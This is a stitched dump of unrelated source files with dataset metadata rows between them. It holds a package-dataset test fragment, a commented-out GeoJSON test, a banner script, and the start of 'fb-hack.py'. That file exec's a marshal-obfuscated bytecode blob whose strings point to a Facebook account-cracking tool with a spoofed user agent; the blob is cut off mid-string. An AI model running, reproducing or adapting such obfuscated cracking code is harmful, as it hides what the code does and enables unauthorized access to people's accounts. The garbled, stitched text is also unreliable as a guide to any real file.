ds.get_projects_meta()
ds.get_project_versions(historical='latest')
ds.update(**{'name': 'test', 'version': '1.0'})
ds.backup('../test.p')
ds = Dataset.restore('../test.p')
ds.export_inputset('../test.json')
# test pypi
ds = Dataset.load_web(
'top4kyear',
registry='pypi',
from_type='list',
cache_dir=CACHE_DIR,
debug=True
)
ds.trim(10)
ds.get_projects_meta()
ds.get_project_versions(historical='latest')
ds.update(**{'name': 'test', 'version': '1.0'})
ds.backup('../test.p')
ds = Dataset.restore('../test.p')
ds.export_inputset('../test.json')
# cleanup files
os.remove('../test.p')
os.remove('../test.json')
| 25.32973 | 51 | 0.564447 | 587 | 4,686 | 4.349233 | 0.109029 | 0.052879 | 0.065805 | 0.075206 | 0.896984 | 0.862906 | 0.862906 | 0.835488 | 0.835488 | 0.784567 | 0 | 0.009296 | 0.242424 | 4,686 | 184 | 52 | 25.467391 | 0.709859 | 0.034144 | 0 | 0.810811 | 0 | 0 | 0.22301 | 0.032365 | 0 | 0 | 0 | 0 | 0 | 1 | 0.02027 | false | 0 | 0.060811 | 0 | 0.081081 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
1ba718abdb42a6cc9ed79887de4dc3c2948d54fd | 2,850 | py | Python | disarm_gears/testing/test_json_helpers.py | disarm-platform/disarm-gears | d9f747687e632102a4ef2821b33936daacb01b6c | [
"MIT"
] | null | null | null | disarm_gears/testing/test_json_helpers.py | disarm-platform/disarm-gears | d9f747687e632102a4ef2821b33936daacb01b6c | [
"MIT"
] | 11 | 2019-02-28T00:18:47.000Z | 2020-02-22T20:36:00.000Z | disarm_gears/testing/test_json_helpers.py | disarm-platform/disarm-gears | d9f747687e632102a4ef2821b33936daacb01b6c | [
"MIT"
] | null | null | null | #import json
#import pandas as pd
#from disarm_gears.util import json_helpers
#
#
#def test_geojson_encoder_3():
#
# df = pd.DataFrame({'lng': [1.1, 1.2, 1.3], 'lat': [-2.3, -2.0, -3.3]})
#
# # dumps = True
# js = json_helpers.geojson_encoder_3(df, layer_names=['layer_1', 'layer_2'], lng='lng', lat='lat', dumps=True)
# js_loads = json.loads(js)
#
# assert isinstance(js, str)
# assert isinstance(js_loads, dict)
#
# assert 'layer_names' in js_loads.keys()
# assert isinstance(js_loads['layer_names'], list)
# assert len(js_loads['layer_names']) == 2
# assert 'layer_1' in js_loads['layer_names']
# assert 'layer_2' in js_loads['layer_names']
#
# assert 'points' in js_loads.keys()
# assert isinstance(js_loads['points'], dict)
# assert len(js_loads['points']) == 2
# assert 'type' in js_loads['points']
# assert js_loads['points']['type'] == 'FeatureCollection'
# assert 'features' in js_loads['points']
# assert isinstance(js_loads['points']['features'], list)
# assert isinstance(js_loads['points']['features'][0], dict)
# assert len(js_loads['points']['features']) == df.shape[0]
# assert 'type' in js_loads['points']['features'][0]
# assert 'geometry' in js_loads['points']['features'][0]
# assert 'properties' in js_loads['points']['features'][0]
# assert js_loads['points']['features'][0]['type'] == 'Feature'
# assert 'coordinates' in js_loads['points']['features'][0]['geometry'].keys()
# assert 'type' in js_loads['points']['features'][0]['geometry'].keys()
#
# # dumps = False
# js_loads = json_helpers.geojson_encoder_3(df, layer_names=['layer_1', 'layer_2'], lng='lng', lat='lat', dumps=False)
#
# assert isinstance(js_loads, dict)
#
# assert 'layer_names' in js_loads.keys()
# assert isinstance(js_loads['layer_names'], list)
# assert len(js_loads['layer_names']) == 2
# assert 'layer_1' in js_loads['layer_names']
# assert 'layer_2' in js_loads['layer_names']
#
# assert 'points' in js_loads.keys()
# assert isinstance(js_loads['points'], dict)
# assert len(js_loads['points']) == 2
# assert 'type' in js_loads['points']
# assert js_loads['points']['type'] == 'FeatureCollection'
# assert 'features' in js_loads['points']
# assert isinstance(js_loads['points']['features'], list)
# assert isinstance(js_loads['points']['features'][0], dict)
# assert len(js_loads['points']['features']) == df.shape[0]
# assert 'type' in js_loads['points']['features'][0]
# assert 'geometry' in js_loads['points']['features'][0]
# assert 'properties' in js_loads['points']['features'][0]
# assert js_loads['points']['features'][0]['type'] == 'Feature'
# assert 'coordinates' in js_loads['points']['features'][0]['geometry'].keys()
# assert 'type' in js_loads['points']['features'][0]['geometry'].keys()
| 42.537313 | 121 | 0.651228 | 395 | 2,850 | 4.508861 | 0.116456 | 0.172937 | 0.20438 | 0.21224 | 0.892757 | 0.892757 | 0.892757 | 0.892757 | 0.892757 | 0.892757 | 0 | 0.017688 | 0.147018 | 2,850 | 66 | 122 | 43.181818 | 0.714932 | 0.953684 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
9416503896ceadd0e38c57fcd517912e8f553e36 | 1,579 | py | Python | banner.py | Alperenae/whitebox-framework | 3fb5cea788e7eea5ff5f96991c8bb6a16ac6cd05 | [
"MIT"
] | 3 | 2020-05-28T15:36:55.000Z | 2020-09-29T20:44:22.000Z | banner.py | Alperenae/whitebox-framework | 3fb5cea788e7eea5ff5f96991c8bb6a16ac6cd05 | [
"MIT"
] | null | null | null | banner.py | Alperenae/whitebox-framework | 3fb5cea788e7eea5ff5f96991c8bb6a16ac6cd05 | [
"MIT"
] | null | null | null | # COLORS
OKGREEN = '\033[92m'
ENDC = '\033[0m'
print("")
print("\ \ / / | | (_) | | | _ \ / _| \ \ / / | |")
print(" \ \ /\ / / | |__ _ | |_ ___ | |_) | ___ __ __ ______ | |_ _ __ __ _ _ __ ___ ___ \ \ /\ / / ___ _ __ | | __")
print(" \ \/ \/ / | '_ \ | | | __| / _ \ | _ < / _ \ \ \/ / |______| | _| | '__| / _` | | '_ ` _ \ / _ \ \ \/ \/ / / _ \ | '__| | |/ /")
print(" \ /\ / | | | | | | | |_ | __/ | |_) | | (_) | > < | | | | | (_| | | | | | | | | __/ \ /\ / | (_) | | | | <")
print(" \/ \/ |_| |_| |_| \__| \___| |____/ \___/ /_/\_\ |_| |_| \__,_| |_| |_| |_| \___| \/ \/ \___/ |_| |_|\_/")
print( OKGREEN+" v.0.1" + ENDC)
| 98.6875 | 236 | 0.120329 | 19 | 1,579 | 4.052632 | 0.526316 | 0.779221 | 0.974026 | 1.038961 | 0.454545 | 0.454545 | 0 | 0 | 0 | 0 | 0 | 0.025463 | 0.726409 | 1,579 | 16 | 237 | 98.6875 | 0.152778 | 0.0038 | 0 | 0 | 0 | 0.555556 | 0.521629 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.777778 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 8 |
846a43d85ea3558d7935b77a5c54cb68d51d652b | 64,091 | py | Python | fb-hack.py | GHOST-PSYCHO/FB-HACKING-TOOL | 339c6afd32fa93b0de7e486ac7cb2ba51a23a8c1 | [
"Apache-2.0"
] | null | null | null | fb-hack.py | GHOST-PSYCHO/FB-HACKING-TOOL | 339c6afd32fa93b0de7e486ac7cb2ba51a23a8c1 | [
"Apache-2.0"
] | null | null | null | fb-hack.py | GHOST-PSYCHO/FB-HACKING-TOOL | 339c6afd32fa93b0de7e486ac7cb2ba51a23a8c1 | [
"Apache-2.0"
] | 1 | 2020-08-02T08:36:40.000Z | 2020-08-02T08:36:40.000Z | #The Credit For This Code Goes To Alamin Islam
#If You Wanna Take Credits For This Code, Please Look Yourself Again...
#Developer Alamin Islam
#Reserved2020
#Github : https://github.com/GHOST-PSYCHO
#Don't Try Edit or Modify This Script Otherwise I will Interrupt
import marshal
exec(marshal.loads('c\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x90\x02\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x01\x00l\x02\x00Z\x02\x00d\x00\x00d\x01\x00l\x03\x00Z\x03\x00d\x00\x00d\x01\x00l\x04\x00Z\x04\x00d\x00\x00d\x01\x00l\x05\x00Z\x05\x00d\x00\x00d\x01\x00l\x06\x00Z\x06\x00d\x00\x00d\x01\x00l\x07\x00Z\x07\x00d\x00\x00d\x01\x00l\x08\x00Z\x08\x00d\x00\x00d\x01\x00l\t\x00Z\t\x00d\x00\x00d\x01\x00l\n\x00Z\n\x00d\x00\x00d\x01\x00l\x0b\x00Z\x0b\x00d\x00\x00d\x01\x00l\x0c\x00Z\x0c\x00d\x00\x00d\x02\x00l\r\x00m\x0e\x00Z\x0e\x00\x01d\x00\x00d\x03\x00l\x0f\x00m\x10\x00Z\x10\x00\x01d\x00\x00d\x04\x00l\x0c\x00m\x11\x00Z\x11\x00\x01e\x12\x00e\x01\x00\x83\x01\x00\x01e\x01\x00j\x13\x00d\x05\x00\x83\x01\x00\x01e\x0c\x00j\x11\x00\x83\x00\x00Z\x14\x00e\x14\x00j\x15\x00e\x16\x00\x83\x01\x00\x01e\x14\x00j\x17\x00e\x0c\x00j\x18\x00j\x19\x00\x83\x00\x00d\x06\x00d\x07\x00\x83\x01\x01\x01d\x08\x00d\t\x00f\x02\x00g\x01\x00e\x14\x00_\x1a\x00d\n\x00\x84\x00\x00Z\x1b\x00d\x0b\x00\x84\x00\x00Z\x1c\x00d\x0c\x00\x84\x00\x00Z\x1d\x00d\r\x00\x84\x00\x00Z\x1e\x00d\x0e\x00Z\x1f\x00d\x0f\x00\x84\x00\x00Z \x00d\x10\x00Z!\x00g\x00\x00Z"\x00g\x00\x00Z#\x00g\x00\x00a$\x00g\x00\x00Z%\x00g\x00\x00Z&\x00d\x11\x00Z\'\x00d\x12\x00Z(\x00e\x00\x00j)\x00d\x13\x00\x83\x01\x00\x01d\x14\x00GHe\x1e\x00d\x15\x00\x83\x01\x00\x01d\x16\x00GHd\x17\x00Z*\x00d\x18\x00Z+\x00d\x19\x00Z,\x00x\x86\x00e,\x00d\x19\x00k\x02\x00rH\x02e-\x00d\x1a\x00\x83\x01\x00Z.\x00e.\x00e*\x00k\x02\x00r3\x02e-\x00d\x1b\x00\x83\x01\x00Z/\x00e/\x00e+\x00k\x02\x00r\x1e\x02d\x1c\x00e.\x00\x17GHe\x02\x00j0\x00d\x1d\x00\x83\x01\x00\x01d\x1e\x00Z,\x00n\x12\x00d\x1f\x00GHe\x00\x00j)\x00d \x00\x83\x01\x00\x01n\x12\x00d!\x00GHe\x00\x00j)\x00d \x00\x83\x01\x00\x01q\xc3\x01Wd"\x00\x84\x00\x00Z1\x00d#\x00\x84\x00\x00Z2\x00d$\x00\x84\x00\x00Z3\x00d%\x00\x84\x00\x00Z4\x00d&\x00\x84\x00\x00Z5\x00e6\x00d\'\x00k\x02\x00r\x8c\x02e1\x00\x83\x00\x00\x01n\x00\x00d\x01\x00S((\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\n\x00\x00\x00ThreadPool(\x01\x00\x00\x00t\x0f\x00\x00\x00ConnectionError(\x01\x00\x00\x00t\x07\x00\x00\x00Browsert\x04\x00\x00\x00utf8t\x08\x00\x00\x00max_timei\x01\x00\x00\x00s\n\x00\x00\x00User-AgentsR\x00\x00\x00Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00C\x00\x00\x00s\x16\x00\x00\x00d\x01\x00GHt\x00\x00j\x01\x00j\x02\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns\x0b\x00\x00\x00\x1b[1;91mExit(\x03\x00\x00\x00t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<febry>t\x06\x00\x00\x00keluar\x16\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x05\x01c\x01\x00\x00\x00\x04\x00\x00\x00\x08\x00\x00\x00C\x00\x00\x00sS\x00\x00\x00d\x01\x00}\x01\x00d\x02\x00}\x02\x00x:\x00t\x00\x00D]2\x00}\x03\x00|\x02\x00d\x03\x00|\x01\x00t\x01\x00j\x02\x00d\x04\x00t\x03\x00|\x01\x00\x83\x01\x00d\x05\x00\x18\x83\x02\x00\x19\x17|\x03\x00\x177}\x02\x00q\x13\x00Wt\x04\x00|\x02\x00\x83\x01\x00S(\x06\x00\x00\x00Nt\x07\x00\x00\x00ahtdzjct\x00\x00\x00\x00t\x01\x00\x00\x00!i\x00\x00\x00\x00i\x01\x00\x00\x00(\x05\x00\x00\x00t\x01\x00\x00\x00xt\x06\x00\x00\x00randomt\x07\x00\x00\x00randintt\x03\x00\x00\x00lent\x05\x00\x00\x00cetak(\x04\x00\x00\x00t\x01\x00\x00\x00bt\x01\x00\x00\x00wt\x01\x00\x00\x00dt\x01\x00\x00\x00i(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<febry>t\x04\x00\x00\x00acak\x1b\x00\x00\x00s\n\x00\x00\x00\x00\x01\x06\x01\x06\x01\r\x010\x01c\x01\x00\x00\x00\x05\x00\x00\x00\x07\x00\x00\x00C\x00\x00\x00s~\x00\x00\x00d\x01\x00}\x01\x00xA\x00|\x01\x00D]9\x00}\x02\x00|\x01\x00j\x00\x00|\x02\x00\x83\x01\x00}\x03\x00|\x04\x00j\x01\x00d\x02\x00|\x02\x00\x16d\x03\x00t\x02\x00d\x04\x00|\x03\x00\x17\x83\x01\x00\x16\x83\x02\x00}\x04\x00q\r\x00W|\x04\x00d\x05\x007}\x04\x00|\x04\x00j\x01\x00d\x06\x00d\x05\x00\x83\x02\x00}\x04\x00t\x03\x00j\x04\x00j\x05\x00|\x04\x00d\x07\x00\x17\x83\x01\x00\x01d\x00\x00S(\x08\x00\x00\x00NR\t\x00\x00\x00s\x03\x00\x00\x00!%ss\x07\x00\x00\x00\x1b[%s;1mi\x1f\x00\x00\x00s\x04\x00\x00\x00\x1b[0ms\x02\x00\x00\x00!0s\x01\x00\x00\x00\n(\x06\x00\x00\x00t\x05\x00\x00\x00indext\x07\x00\x00\x00replacet\x03\x00\x00\x00strR\x06\x00\x00\x00t\x06\x00\x00\x00stdoutt\x05\x00\x00\x00write(\x05\x00\x00\x00R\x11\x00\x00\x00R\x12\x00\x00\x00R\x14\x00\x00\x00t\x01\x00\x00\x00jR\x0c\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<febry>R\x10\x00\x00\x00#\x00\x00\x00s\x0e\x00\x00\x00\x00\x01\x06\x01\r\x01\x0f\x01(\x01\n\x01\x12\x01c\x01\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00sC\x00\x00\x00x<\x00|\x00\x00d\x01\x00\x17D]0\x00}\x01\x00t\x00\x00j\x01\x00j\x02\x00|\x01\x00\x83\x01\x00\x01t\x00\x00j\x01\x00j\x03\x00\x83\x00\x00\x01t\x04\x00j\x05\x00d\x02\x00\x83\x01\x00\x01q\x0b\x00Wd\x00\x00S(\x03\x00\x00\x00Ns\x01\x00\x00\x00\ng-C\x1c\xeb\xe26\x1a?(\x06\x00\x00\x00R\x06\x00\x00\x00R\x19\x00\x00\x00R\x1a\x00\x00\x00t\x05\x00\x00\x00flusht\x04\x00\x00\x00timet\x05\x00\x00\x00sleep(\x02\x00\x00\x00t\x01\x00\x00\x00zt\x01\x00\x00\x00e(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<febry>t\x05\x00\x00\x00jalan-\x00\x00\x00s\x08\x00\x00\x00\x00\x01\x11\x01\x10\x01\r\x01s\xf8\n\x00\x00\n\x1b[1;94m\n\x1b[1;94m\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x80\x83\xe2\x80\x83\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\n\x1b[1;94m\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x80\x83\xe2\x80\x83\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x9d\n\x1b[1;94m\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\xa6\xe2\x95\x9d\xe2\x80\x83\xe2\x80\x83\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\n\x1b[1;94m\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x80\x83\xe2\x80\x83\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\n\x1b[1;94m\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\xa6\xe2\x95\x9d\xe2\x80\x83\xe2\x80\x83\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x95\x9a\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x9d\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\n\x1b[1;94m\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x80\x83\xe2\x80\x83\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\n\n\x1b[1;96m\xe2\x95\xad\xe2\x94\x81\xe2\x94\x81\xe2\x95\xae\n\x1b[1;96m\xe2\x94\x83\xe2\x95\xad\xe2\x95\xae\xe2\x94\x83\n\x1b[1;96m\xe2\x94\x83\xe2\x95\xb0\xe2\x95\xaf\xe2\x95\xb0\xe2\x94\xb3\xe2\x95\xae\xe2\x95\xb1\xe2\x95\xad\xe2\x95\xae\n\x1b[1;96m\xe2\x94\x83\xe2\x95\xad\xe2\x94\x81\xe2\x95\xae\xe2\x94\x83\xe2\x94\x83\xe2\x95\xb1\xe2\x94\x83\xe2\x94\x83\n\x1b[1;96m\xe2\x94\x83\xe2\x95\xb0\xe2\x94\x81\xe2\x95\xaf\xe2\x94\x83\xe2\x95\xb0\xe2\x94\x81\xe2\x95\xaf\xe2\x94\x83\n\x1b[1;96m\xe2\x95\xb0\xe2\x94\x81\xe2\x94\x81\xe2\x94\x81\xe2\x94\xbb\xe2\x94\x81\xe2\x95\xae\xe2\x95\xad\xe2\x95\xaf\n\x1b[1;96m\xe2\x95\xb1\xe2\x95\xb1\xe2\x95\xb1\xe2\x95\xb1\xe2\x95\xad\xe2\x94\x81\xe2\x95\xaf\xe2\x94\x83\n\x1b[1;96m\xe2\x95\xb1\xe2\x95\xb1\xe2\x95\xb1\xe2\x95\xb1\xe2\x95\xb0\xe2\x94\x81\xe2\x94\x81\xe2\x95\xaf\n\n\x1b[1;92m\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\n\x1b[1;92m\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\n\x1b[1;92m\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\n\x1b[1;92m\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x95\x9a\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x9d\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x95\x9a\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\n\x1b[1;92m\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\n\x1b[1;92m\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x